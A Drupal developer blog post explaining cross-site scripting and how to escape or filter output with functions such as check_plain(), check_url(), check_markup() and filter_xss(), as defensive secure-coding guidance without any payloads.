So… you need to write some code, in which you collect data from somewhere (user’s input, database data or an external source of some kind etc..) and display them to your Drupal website in HTML output (for example in a custom block or page).
What is XSS and how critical is it?
Ok… first things first: what is XSS? An XSS (or Cross-site scripting) vulnerability enables attackers to inject client-side script into Web pages viewed by other users/victims, and possibly to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc.
As stated by OWASP:
“You are vulnerable if you do not ensure that all user supplied input is properly escaped, or you do not verify it to be safe via input validation, before including that input in the output page. “
It is estimated that about 82% of the applications are containing this vulnerability at some point:
The Drupal philosophy - Escape or filter when appropriate
Probably the most common security advice you will hear is that “you should always sanitize/validate/filter user-input data”. The problem with a content management system like Drupal is that the input is not well defined. As written in Drupal’s community documentation “Handle user input with care”, the solution is to use an appropriate filter when needed. Just before sending plain text or HTML to the browser or mixing plain text with HTML, escape it using the proper Drupal function or when you want write an SQL query use the escaping functions provided by the database API.
If you look at how data are stored on Drupal’s database, it should be clear that data are stored in database without any changes at all, and they are being filtered only upon displaying.
Drupal’s approach has of course some pros & cons (storing possibly malicious code in database and filter it later), but if this approach is followed by the developer as well, most issues can be avoided (but always have in mind that nothing is 100% secure).
How to filter output data in code
In this post, we will explain how you should filter in your code the different kinds of output data in order to ensure your website is protected from these attacks.
Image taken from Doing Drupal Security Right presentation, on DrupalCon London 2011 presented by Gábor Hojtsy, Acquia
This image demonstrates the Drupal’s approach you should use.
Let’s start with printing data as Plain Text, which means print the data as is. Any HTML tags or other special characters, should be altered so the user will be shown the text exactly as is, without any processing. The function you should use to filter your data is check_plain(), which encodes special characters (converting them to HTML entities) in a plain-text string for display as HTML and also validates strings as UTF-8 to prevent XSS on Internet Explorer 6.
How the data appear unfiltered (before the horizontal line) & filtered (after). When unfiltered script the (alert function) has already run and not shown to the user. In an actual xss attack the script would have run without the victim noticing it.
But if you intend to pass it as an argument to t(), l(), Drupal_attributes(), or another function that will call check_plain() separately, you should only use drupal_strip_dangerous_protocols() to avoid entities being converted twice (See “Handle text in a secure fashion).
For email addresses both check_plain() and check_url() are solid choices (as with the prefix “mailto:” they are URIs).
Rich Text / HTML
In some other cases you want to display the text as formatted by user and you need to apply some filters on it. In this case we have 2 methods:
- check_markup() , which allows you to use a Text Format, e.g. “Filtered HTML”, and apply its filters to our text.
- filter_xss() or filter_xss_admin(), that removes characters & constructs that can trick browsers and used for XSS, and allows defined tags only. The difference between filter_xss and filter_xss_admin is that the second allows almost all tags that can be used in a HTML body and its intended for admin-only use.
Which of them you should use? Usually if you want to apply more complex filters made by Drupal filter system, like “Convert line breaks into HTML (i.e. <br> and <p>)”, you should use check_markup(). But, if you want to avoid loading the whole Drupal Text Format (and reduce complexity in execution), the filtering you should use is filter_xss().
There are also some functions and APIs which also sanitize their input text (like menu item or breadcrumb titles, some Form API (FAPI) elements or functions with placeholders) usually passing it through check_plain(). Using these, methods filtering the data again might result in unwanted output. See “Handle text in a secure fashion” for additional information.
Security is never enough…
Remember this post only covers a small part of security for Drupal and that you can never have an 100% secure site. But you can do a few things to avoid the most common vulnerabilities. For more security configuration advice you should read Securing your Site from Drupal’s documentation, and if you are writing code for your Drupal project (or why not for drupal community) read Writing Secure Code section.
[Image by: John Maravelakis]